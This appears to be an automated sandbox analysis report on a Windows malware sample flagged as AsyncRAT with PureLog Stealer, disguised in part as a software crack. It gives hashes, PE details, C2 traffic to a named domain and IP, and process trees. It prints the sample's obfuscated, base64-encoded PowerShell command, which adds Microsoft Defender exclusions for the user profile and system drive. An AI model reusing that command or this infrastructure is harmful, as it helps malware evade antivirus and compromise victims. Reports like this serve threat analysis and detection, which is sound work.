C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z35bez3s.p0w.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Ouopxupnarf.exe

Download File

Process:	C:\Users\user\AppData\Local\Hzoynygqzv.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2266112
Entropy (8bit):	7.9971276799484725
Encrypted:	true
SSDEEP:	49152:+7ltMGnUX+5wSm9J5jqqLY8G1PZcIEDU+I7fIDjkqNS2qRUH4:+AGc+5dm17gxbQU+GMoqNSdUH
MD5:	A6894B09A24E7F7AAE0B17614279BE90
SHA1:	F45AA4D72E401B64FC99ECB4E27DE98125A7D9F5
SHA-256:	599803EE475FA2222E1E1537B60893678D2C53087419BB72758C75B4D8862D65
SHA-512:	26B52D6DFC3A23D3859E978D18010B5E4B7F0E1EA41340FB359854E5A3CCD61F64DB06087901C9BF625466BC388E8C6C9D5479449A0894CFD9F16F7AC1410DDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67% Antivirus: Virustotal, Detection: 63%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.!f..................!.........N.!.. ....!...@.. ........................"...........`...................................!.L.....!.......................".....................................................\.!.............. ..H............text...d.!.. ....!................. ..`.rsrc.........!.......!.............@..@.reloc........".......".............@..B................H.........!.F............#...!..........................................0..........s................}...........s.............s......~....%:....&~..........s....%.....~....:....~..........s.................(....}.....{....o...............0..j...........(........(......9...........&..s........r...p(....r3..p(....o......s.......s...........s..........o......o......-.....9......o.......9......o.......9......o.......>......<......X.X.8U.....?......<+.....>.......o....8.........o......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.998344107835079
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	KMj8h32vWy.exe
File size:	2'349'056 bytes
MD5:	2ad3527444357f19cd120fa1b8bd2f23
SHA1:	ac986ab9967bc084565ed13aa9434eafcc6d4752
SHA256:	dedc15a14da607a8c993e869ab600a5be154e1853c45e0493727244e627cb2a9
SHA512:	c4d0f3f1bc2c18d85454354c9c16484e948554a97676be16b05cfe82fbd2574c5b5b492ce386831996414adce54a5b04ac28b6be8594c880184eb24ae9ba2f42
SSDEEP:	49152:HJ0TBxevspc1iFJsFhyDIIXoWNRsD10/x5X3lJmRkh:Hieva/FYOIIXo1DS/7FJ2
TLSH:	10B5230C8793FF56C2DCC9380A82988338677745EE30D6965A5D9A6927CD387B78807F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.............................#...............#...@...........................$......+$....................................

File Icon


Icon Hash:	008004341b034110

Static PE Info

General

Entrypoint:	0x4014d1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a9c887a4f18a3fede2cc29ceea138ed3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000008h
nop
mov eax, 00000004h
push eax
mov eax, 00000000h
push eax
lea eax, dword ptr [ebp-04h]
push eax
call 00007FDB4CB13B8Dh
add esp, 0Ch
mov eax, 004014AFh
push eax
call 00007FDB4CB13BC7h
mov eax, 00000001h
push eax
call 00007FDB4CB13BC4h
add esp, 04h
mov eax, 00030000h
push eax
mov eax, 00010000h
push eax
call 00007FDB4CB13BB8h
add esp, 08h
mov eax, dword ptr [0063E044h]
mov ecx, dword ptr [0063E048h]
mov edx, dword ptr [0063E04Ch]
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-04h]
push eax
mov eax, dword ptr [0063F000h]
push eax
push edx
push ecx
mov eax, dword ptr [ebp-08h]
push eax
call 00007FDB4CB13B92h
add esp, 14h
mov eax, dword ptr [0063E044h]
mov ecx, dword ptr [0063E048h]
mov edx, dword ptr [0063E04Ch]
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [edx]
push eax
mov eax, dword ptr [ecx]
push eax
mov eax, dword ptr [ebp-08h]
mov eax, dword ptr [eax]
push eax
call 00007FDB4CB1396Ch
add esp, 0Ch
push eax
call 00007FDB4CB13B68h
add esp, 04h
leave
ret
push ebp
mov ebp, esp
sub esp, 00000004h
nop
mov eax, dword ptr [0063E044h]
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23dfd0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x240000	0x928	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23e020	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x668	0x800	56b57e90427bcded28112a23537ced23	False	0.41064453125	data	4.607547874179972	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x23c1d3	0x23c200	9f047fdb71e68ab642eb8f2640d0ae69	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x23f000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x240000	0x928	0xa00	a87222a915a143ddc35b61ab107c41cb	False	0.3359375	data	3.7455769077932715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x240148	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.22311827956989247
RT_GROUP_ICON	0x240430	0x14	data	English	United States	1.2
RT_VERSION	0x240448	0x224	data	English	United States	0.4562043795620438
RT_MANIFEST	0x240670	0x2b2	XML 1.0 document, ASCII text	English	United States	0.4753623188405797

Imports

DLL	Import
msvcrt.dll	malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
shell32.dll	ShellExecuteA
kernel32.dll	SetUnhandledExceptionFilter

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/25/24-08:27:00.366151	TCP	2035595	ET TROJAN Generic AsyncRAT Style SSL Cert	6606	49730	91.92.253.249	192.168.2.4
04/25/24-08:27:00.366151	TCP	2030673	ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)	6606	49730	91.92.253.249	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 08:26:59.919636965 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:00.119086981 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:00.119355917 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:00.139611006 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:00.366151094 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:00.366301060 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:00.366395950 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:00.372073889 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:00.578329086 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:00.629431009 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:01.373209000 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:01.626969099 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:01.627091885 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:01.876977921 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:07.119750977 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:07.160710096 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:07.359889984 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:07.410701036 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:14.052553892 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:14.298932076 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:14.302016020 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:14.503690004 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:14.551620960 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:14.750967979 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:14.752998114 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:15.002012968 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:15.002119064 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:15.252263069 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:28.099499941 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:28.345968008 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:28.346126080 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:28.546884060 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:28.598387003 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:28.799209118 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:28.801994085 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:29.048975945 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:29.049110889 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:29.299043894 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:33.492244959 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:33.535945892 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:33.735095024 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:33.785851002 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:39.474539042 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:39.721029043 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:39.721165895 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:39.921987057 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:39.973321915 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:40.172476053 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:40.174369097 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:40.424642086 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:40.424741030 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:40.674041033 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:52.176985979 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:52.424030066 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:52.424097061 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:52.625452995 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:52.676516056 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:52.877882957 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:52.879389048 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:53.127672911 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:27:53.127753019 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:27:53.378509045 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:03.450422049 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:03.504668951 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:03.703888893 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:03.754637003 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:04.880235910 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:05.127324104 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:05.127396107 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:05.329119921 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:05.379762888 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:05.578957081 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:05.583060026 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:05.830457926 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:05.831028938 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:06.080509901 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:17.569056034 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:17.814912081 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:17.814980984 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:18.016001940 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:18.067238092 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:18.266519070 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:18.269982100 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:18.517786980 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:18.517888069 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:18.767851114 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:30.270792961 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:30.517855883 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:30.517937899 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:30.718450069 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:30.770351887 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:30.969621897 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:30.971786976 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:31.221029997 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:31.221108913 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:31.470985889 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:33.520719051 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:33.567243099 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:33.768982887 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:33.817271948 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:42.974159956 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:43.221479893 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:43.221657038 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:43.430650949 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:43.473522902 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:43.672590971 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:43.674716949 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:43.924083948 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:43.924372911 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:44.174226999 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:57.597767115 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:57.846632957 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:57.846704006 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:58.047502041 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:58.098611116 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:58.297725916 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:58.301294088 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:58.549046993 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:28:58.549164057 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:28:58.802426100 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:29:03.418559074 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:29:03.473586082 CEST	49730	6606	192.168.2.4	91.92.253.249
Apr 25, 2024 08:29:03.672677040 CEST	6606	49730	91.92.253.249	192.168.2.4
Apr 25, 2024 08:29:03.723583937 CEST	49730	6606	192.168.2.4	91.92.253.249

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 08:26:59.766155005 CEST	60220	53	192.168.2.4	1.1.1.1
Apr 25, 2024 08:26:59.903264046 CEST	53	60220	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 08:26:59.766155005 CEST	192.168.2.4	1.1.1.1	0xc104	Standard query (0)	tomx.brasilia.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 08:26:59.903264046 CEST	1.1.1.1	192.168.2.4	0xc104	No error (0)	tomx.brasilia.me	91.92.253.249	A (IP address)	IN (0x0001)	false
Apr 25, 2024 08:27:00.787290096 CEST	1.1.1.1	192.168.2.4	0x7b28	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 08:27:00.787290096 CEST	1.1.1.1	192.168.2.4	0x7b28	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 08:27:12.439332962 CEST	1.1.1.1	192.168.2.4	0x796	No error (0)	windowsupdatebg.s.llnwi.net	69.164.42.0	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	08:26:52
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\KMj8h32vWy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KMj8h32vWy.exe"
Imagebase:	0x400000
File size:	2'349'056 bytes
MD5 hash:	2AD3527444357F19CD120FA1B8BD2F23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:26:52
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA="
Imagebase:	0x590000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:26:52
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:26:52
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Hzoynygqzv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Hzoynygqzv.exe"
Imagebase:	0x860000
File size:	2'266'112 bytes
MD5 hash:	A6894B09A24E7F7AAE0B17614279BE90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1654293004.0000000005570000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1656376036.0000000005950000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs Detection: 63%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:26:52
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe"
Imagebase:	0x400000
File size:	76'288 bytes
MD5 hash:	DCDC109069B6E0D80D776C143FECDE3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs Detection: 70%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:26:54
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x420000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2892516704.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2890976907.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:26:54
Start date:	25/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:27:06
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Ouopxupnarf.exe"
Imagebase:	0xc10000
File size:	2'266'112 bytes
MD5 hash:	A6894B09A24E7F7AAE0B17614279BE90
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1814061192.00000000043BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1805104418.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
